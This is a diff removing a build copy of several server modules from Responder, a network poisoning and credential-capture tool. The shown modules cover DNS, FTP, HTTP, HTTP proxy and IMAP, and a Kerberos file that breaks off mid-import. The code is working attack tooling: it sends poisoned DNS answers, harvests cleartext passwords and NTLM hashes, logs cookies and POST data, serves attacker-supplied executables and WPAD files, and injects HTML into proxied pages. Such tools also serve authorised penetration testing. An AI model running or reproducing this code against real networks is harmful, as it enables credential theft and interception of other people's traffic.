print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client.replace("::ffff:",""), Name,Role,Domain)))
RAPInfo = RAPThisDomain(Client, Domain)
if RAPInfo is not None:
print(RAPInfo)
except:
pass
def ParseDatagramNBTNames(data,Client):
try:
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client.replace("::ffff:",""), Name, Role1, Domain, Role2)))
RAPInfo = RAPThisDomain(Client, Domain)
if RAPInfo is not None:
print(RAPInfo)
except:
pass
class Browser(BaseRequestHandler):
def handle(self):
try:
request, socket = self.request
if settings.Config.AnalyzeMode:
ParseDatagramNBTNames(NetworkRecvBufferPython2or3(request),self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception:
pass

134
build/lib/Responder/servers/DNS.py
View file

@ -1,134 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
from Responder.packets import DNS_Ans, DNS_SRV_Ans, DNS6_Ans, DNS_AnsOPT
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
#Should we answer to those AAAA?
Have_IPv6 = settings.Config.IPv6
def ParseDNSType(data):
QueryTypeClass = data[len(data)-4:]
OPT = data[len(data)-22:len(data)-20]
if OPT == "\x00\x29":
return "OPTIPv4"
# If Type A, Class IN, then answer.
elif QueryTypeClass == "\x00\x01\x00\x01":
return "A"
elif QueryTypeClass == "\x00\x21\x00\x01":
return "SRV"
elif QueryTypeClass == "\x00\x1c\x00\x01":
return "IPv6"
class DNS(BaseRequestHandler):
def handle(self):
# Ditch it if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
return None
try:
data, soc = self.request
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A":
buff = DNS_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4":
buff = DNS_AnsOPT()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV":
buff = DNS_SRV_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6:
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6:
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
except Exception:
pass
# DNS Server TCP Class
class DNSTCP(BaseRequestHandler):
def handle(self):
# Break out if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
return None
try:
data = self.request.recv(1024)
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A":
buff = DNS_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4":
buff = DNS_AnsOPT()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV":
buff = DNS_SRV_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6:
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6:
buff = DNS6_AnsOPT()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA OPT Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
except Exception:
pass

59
build/lib/Responder/servers/FTP.py
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@ -1,59 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import FTPPacket
class FTP(BaseRequestHandler):
def handle(self):
try:
self.request.send(NetworkSendBufferPython2or3(FTPPacket()))
data = self.request.recv(1024)
if data[0:4] == b'USER':
User = data[5:].strip().decode("latin-1")
Packet = FTPPacket(Code="331",Message="User name okay, need password.")
self.request.send(NetworkSendBufferPython2or3(Packet))
data = self.request.recv(1024)
if data[0:4] == b'PASS':
Pass = data[5:].strip().decode("latin-1")
Packet = FTPPacket(Code="530",Message="User not logged in.")
self.request.send(NetworkSendBufferPython2or3(Packet))
SaveToDb({
'module': 'FTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User + ':' + Pass
})
else:
Packet = FTPPacket(Code="502",Message="Command not implemented.")
self.request.send(NetworkSendBufferPython2or3(Packet))
data = self.request.recv(1024)
except Exception:
self.request.close()
pass

320
build/lib/Responder/servers/HTTP.py
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@ -1,320 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import codecs
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler, StreamRequestHandler
else:
from SocketServer import BaseRequestHandler, StreamRequestHandler
from base64 import b64decode, b64encode
from Responder.packets import NTLM_Challenge
from Responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer
from Responder.packets import WPADScript, ServeExeFile, ServeHtmlFile
# Parse NTLMv1/v2 hash.
def ParseHTTPHash(data, Challenge, client, module):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen]
LMHashFinal = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen]
NTHashFinal = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
Challenge1 = codecs.encode(Challenge,'hex').decode('latin-1')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
SaveToDb({
'module': module,
'type': 'NTLMv1',
'client': client,
'host': HostName,
'user': User,
'hash': LMHashFinal+':'+NTHashFinal,
'fullhash': WriteHash,
})
if NthashLen > 24:
NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
SaveToDb({
'module': module,
'type': 'NTLMv2',
'client': client,
'host': HostName,
'user': Domain + '\\' + User,
'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
'fullhash': WriteHash,
})
def GrabCookie(data, host):
Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1 and settings.Config.Verbose:
print(text("[HTTP] Cookie : %s " % Cookie))
return Cookie
return False
def GrabReferer(data, host):
Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
if Referer:
Referer = Referer.group(0).replace('Referer: ', '')
if settings.Config.Verbose:
print(text("[HTTP] Referer : %s " % color(Referer, 3)))
return Referer
return False
def WpadCustom(data, client):
Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
return False
def IsWebDAV(data):
dav = re.search('PROPFIND', data)
if dav:
return True
else:
return False
def ServeOPTIONS(data):
WebDav= re.search('OPTIONS', data)
if WebDav:
Buffer = WEBDAV_Options_Answer()
return str(Buffer)
return False
def ServeFile(Filename):
with open (Filename, "rb") as bk:
return NetworkRecvBufferPython2or3(bk.read())
def RespondWithFile(client, filename, dlname=None):
if filename.endswith('.exe'):
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
else:
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
Buffer.calculate()
print(text("[HTTP] Sending file %s to %s" % (filename, client)))
return str(Buffer)
def GrabURL(data, host):
GET = re.findall(r'(?<=GET )[^HTTP]*', data)
POST = re.findall(r'(?<=POST )[^HTTP]*', data)
POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
if GET and settings.Config.Verbose:
print(text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5))))
if POST and settings.Config.Verbose:
print(text("[HTTP] POST request from: %-15s URL: %s" % (host, color(''.join(POST), 5))))
if len(''.join(POSTDATA)) > 2:
print(text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip()))
# Handle HTTP packet sequence.
def PacketSequence(data, client, Challenge):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
# Serve the .exe if needed
if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall('.exe', data)):
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the custom HTML if needed
if settings.Config.Serve_Html:
return RespondWithFile(client, settings.Config.Html_Filename)
WPAD_Custom = WpadCustom(data, client)
# Webdav
if ServeOPTIONS(data):
return ServeOPTIONS(data)
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == b'\x01':
GrabURL(data, client)
#GrabReferer(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
Buffer_Ans.calculate()
return Buffer_Ans
if Packet_NTLM == b'\x03':
NTLM_Auth = b64decode(''.join(NTLM_Auth))
if IsWebDAV(data):
module = "WebDAV"
else:
module = "HTTP"
ParseHTTPHash(NTLM_Auth, Challenge, client, module)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return Buffer
elif NTLM_Auth2:
Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
if Packet_NTLM == b'\x01':
GrabURL(data, client)
#GrabReferer(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
Buffer_Ans.calculate()
return Buffer_Ans
if Packet_NTLM == b'\x03':
NTLM_Auth = b64decode(''.join(NTLM_Auth2))
if IsWebDAV(data):
module = "WebDAV"
else:
module = "HTTP"
ParseHTTPHash(NTLM_Auth, Challenge, client, module)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return Buffer
elif Basic_Auth:
ClearText_Auth = b64decode(''.join(Basic_Auth))
GrabURL(data, client)
#GrabReferer(data, client)
GrabCookie(data, client)
SaveToDb({
'module': 'HTTP',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[0],
'cleartext': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[1],
})
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
if settings.Config.Verbose:
print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return Buffer
else:
if settings.Config.Basic:
r = IIS_Basic_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
else:
r = IIS_Auth_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
return Response
# HTTP Server class
class HTTP(BaseRequestHandler):
def handle(self):
try:
Challenge = RandomChallenge()
while True:
self.request.settimeout(3)
remaining = 10*1024*1024 #setting max recieve size
data = ''
while True:
buff = ''
buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
if buff == '':
break
data += buff
remaining -= len(buff)
#check if we recieved the full header
if data.find('\r\n\r\n') != -1:
#we did, now to check if there was anything else in the request besides the header
if data.find('Content-Length') == -1:
#request contains only header
break
else:
#searching for that content-length field in the header
for line in data.split('\r\n'):
if line.find('Content-Length') != -1:
line = line.strip()
remaining = int(line.split(':')[1].strip()) - len(data)
if remaining <= 0:
break
if data == "":
break
#now the data variable has the full request
Buffer = WpadCustom(data, self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.request.send(NetworkSendBufferPython2or3(Buffer))
self.request.close()
if settings.Config.Verbose:
print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0].replace("::ffff:","")))
else:
Buffer = PacketSequence(data,self.client_address[0], Challenge)
self.request.send(NetworkSendBufferPython2or3(Buffer))
except:
pass

358
build/lib/Responder/servers/HTTP_Proxy.py
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@ -1,358 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
import urllib.parse as urlparse
import http.server as BaseHTTPServer
else:
import urlparse
import BaseHTTPServer
import select
import zlib
from Responder.servers.HTTP import RespondWithFile
IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ]
def InjectData(data, client, req_uri):
# Serve the .exe if needed
if settings.Config.Serve_Always:
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the .exe if needed and client requested a .exe
if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))
if len(data.split(b'\r\n\r\n')) > 1:
try:
Headers, Content = data.split(b'\r\n\r\n')
except:
return data
RedirectCodes = ['HTTP/1.1 300', 'HTTP/1.1 301', 'HTTP/1.1 302', 'HTTP/1.1 303', 'HTTP/1.1 304', 'HTTP/1.1 305', 'HTTP/1.1 306', 'HTTP/1.1 307']
if set(RedirectCodes) & set(Headers):
return data
Len = b''.join(re.findall(b'(?<=Content-Length: )[^\r\n]*', Headers))
if b'content-encoding: gzip' in Headers.lower():
Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
if b'content-type: text/html' in Headers.lower():
if settings.Config.Serve_Html: # Serve the custom HTML if needed
return RespondWithFile(client, settings.Config.Html_Filename)
HasBody = re.findall(b'(<body[^>]*>)', Content, re.IGNORECASE)
if HasBody and len(settings.Config.HtmlToInject) > 2 and not req_uri.endswith('.js'):
if settings.Config.Verbose:
print(text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1)))
Content = Content.replace(HasBody[0], b'%s\n%s' % (HasBody[0], settings.Config.HtmlToInject.encode('latin-1')))
if b'content-encoding: gzip' in Headers.lower():
Content = zlib.compress(Content)
Headers = Headers.replace(b'Content-Length: '+Len, b'Content-Length: '+ NetworkSendBufferPython2or3(len(Content)))
data = Headers +b'\r\n\r\n'+ Content
else:
if settings.Config.Verbose:
print(text("[PROXY] Returning unmodified HTTP response"))
return data
class ProxySock:
def __init__(self, socket, proxy_host, proxy_port) :
# First, use the socket, without any change
self.socket = socket
# Create socket (use real one)
self.proxy_host = proxy_host
self.proxy_port = proxy_port
# Copy attributes
self.family = socket.family
self.type = socket.type
self.proto = socket.proto
def connect(self, address) :
# Store the real remote adress
self.host, self.port = address
# Try to connect to the proxy
for (family, socktype, proto, canonname, sockaddr) in socket.getaddrinfo(
self.proxy_host,
self.proxy_port,
0, 0, socket.SOL_TCP):
try:
# Replace the socket by a connection to the proxy
self.socket = socket.socket(family, socktype, proto)
self.socket.connect(sockaddr)
except socket.error as msg:
if self.socket:
self.socket.close()
self.socket = None
continue
break
if not self.socket :
raise socket.error(msg)
# Ask him to create a tunnel connection to the target host/port
self.socket.send(
("CONNECT %s:%d HTTP/1.1\r\n" +
"Host: %s:%d\r\n\r\n") % (self.host, self.port, self.host, self.port))
# Get the response
resp = self.socket.recv(4096)
# Parse the response
parts = resp.split()
# Not 200 ?
if parts[1] != "200":
print(color("[!] Error response from upstream proxy: %s" % resp, 1))
pass
# Wrap all methods of inner socket, without any change
def accept(self) :
return self.socket.accept()
def bind(self, *args) :
return self.socket.bind(*args)
def close(self) :
return self.socket.close()
def fileno(self) :
return self.socket.fileno()
def getsockname(self) :
return self.socket.getsockname()
def getsockopt(self, *args) :
return self.socket.getsockopt(*args)
def listen(self, *args) :
return self.socket.listen(*args)
def makefile(self, *args) :
return self.socket.makefile(*args)
def recv(self, *args) :
return self.socket.recv(*args)
def recvfrom(self, *args) :
return self.socket.recvfrom(*args)
def recvfrom_into(self, *args) :
return self.socket.recvfrom_into(*args)
def recv_into(self, *args) :
return self.socket.recv_into(buffer, *args)
def send(self, *args) :
try: return self.socket.send(*args)
except: pass
def sendall(self, *args) :
return self.socket.sendall(*args)
def sendto(self, *args) :
return self.socket.sendto(*args)
def setblocking(self, *args) :
return self.socket.setblocking(*args)
def settimeout(self, *args) :
return self.socket.settimeout(*args)
def gettimeout(self) :
return self.socket.gettimeout()
def setsockopt(self, *args):
return self.socket.setsockopt(*args)
def shutdown(self, *args):
return self.socket.shutdown(*args)
# Return the (host, port) of the actual target, not the proxy gateway
def getpeername(self) :
return self.host, self.port
# Inspired from Tiny HTTP proxy, original work: SUZUKI Hisao.
class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
__base = BaseHTTPServer.BaseHTTPRequestHandler
__base_handle = __base.handle
rbufsize = 0
def handle(self):
(ip, port) = self.client_address[0], self.client_address[1]
if settings.Config.Verbose:
print(text("[PROXY] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
self.__base_handle()
def _connect_to(self, netloc, soc):
i = netloc.find(':')
if i >= 0:
host_port = netloc[:i], int(netloc[i+1:])
else:
host_port = netloc, 80
try: soc.connect(host_port)
except socket.error as arg:
try: msg = arg[1]
except: msg = arg
self.send_error(404, msg)
return 0
return 1
def socket_proxy(self, af, fam):
Proxy = settings.Config.Upstream_Proxy
Proxy = Proxy.rstrip('/').replace('http://', '').replace('https://', '')
Proxy = Proxy.split(':')
try: Proxy = (Proxy[0], int(Proxy[1]))
except: Proxy = (Proxy[0], 8080)
soc = socket.socket(af, fam)
return ProxySock(soc, Proxy[0], Proxy[1])
def do_CONNECT(self):
if settings.Config.Upstream_Proxy:
soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM)
else:
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if self._connect_to(self.path, soc):
self.wfile.write(NetworkSendBufferPython2or3(self.protocol_version +" 200 Connection established\r\n"))
self.wfile.write(NetworkSendBufferPython2or3("Proxy-agent: %s\r\n"% self.version_string()))
self.wfile.write(NetworkSendBufferPython2or3("\r\n"))
try:
self._read_write(soc, 300)
except:
pass
except:
raise
pass
finally:
soc.close()
self.connection.close()
def do_GET(self):
(scm, netloc, path, params, query, fragment) = urlparse.urlparse(self.path, 'http')
if netloc in IgnoredDomains:
#self.send_error(200, "OK")
return
if scm not in 'http' or fragment or not netloc:
self.send_error(400, "bad url %s" % self.path)
return
if settings.Config.Upstream_Proxy:
soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM)
else:
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
URL_Unparse = urlparse.urlunparse(('', '', path, params, query, ''))
if self._connect_to(netloc, soc):
soc.send(NetworkSendBufferPython2or3("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version)))
Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''
if settings.Config.Verbose:
print(text("[PROXY] Client : %s" % color(self.client_address[0].replace("::ffff:",""), 3)))
print(text("[PROXY] Requested URL : %s" % color(self.path, 3)))
print(text("[PROXY] Cookie : %s" % Cookie))
self.headers['Connection'] = 'close'
del self.headers['Proxy-Connection']
del self.headers['If-Range']
del self.headers['Range']
for k, v in self.headers.items():
soc.send(NetworkSendBufferPython2or3("%s: %s\r\n" % (k.title(), v)))
soc.send(NetworkSendBufferPython2or3("\r\n"))
try:
self._read_write(soc, netloc)
except:
pass
except:
pass
finally:
soc.close()
self.connection.close()
def _read_write(self, soc, netloc='', max_idling=30):
iw = [self.connection, soc]
ow = []
count = 0
while 1:
count += 1
(ins, _, exs) = select.select(iw, ow, iw, 1)
if exs:
break
if ins:
for i in ins:
if i is soc:
out = self.connection
try:
data = i.recv(4096)
if len(data) > 1:
data = InjectData(data, self.client_address[0], self.path)
except:
pass
else:
out = soc
try:
data = i.recv(4096)
if self.command == b'POST' and settings.Config.Verbose:
print(text("[PROXY] POST Data : %s" % data))
except:
pass
if data:
try:
out.send(data)
count = 0
except:
pass
if count == max_idling:
break
return None
do_HEAD = do_GET
do_POST = do_GET
do_PUT = do_GET
do_DELETE=do_GET

48
build/lib/Responder/servers/IMAP.py
View file

@ -1,48 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from Responder.utils import *
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
class IMAP(BaseRequestHandler):
def handle(self):
try:
self.request.send(NetworkSendBufferPython2or3(IMAPGreeting()))
data = self.request.recv(1024)
if data[5:15] == b'CAPABILITY':
RequestTag = data[0:4]
self.request.send(NetworkSendBufferPython2or3(IMAPCapability()))
self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=RequestTag.decode("latin-1"))))
data = self.request.recv(1024)
if data[5:10] == b'LOGIN':
Credentials = data[10:].strip().decode("latin-1").split('"')
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Credentials[1],
'cleartext': Credentials[3],
'fullhash': Credentials[1]+":"+Credentials[3],
})
except Exception:
pass

149
build/lib/Responder/servers/Kerberos.py
View file

@ -1,149 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import codecs
import struct
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
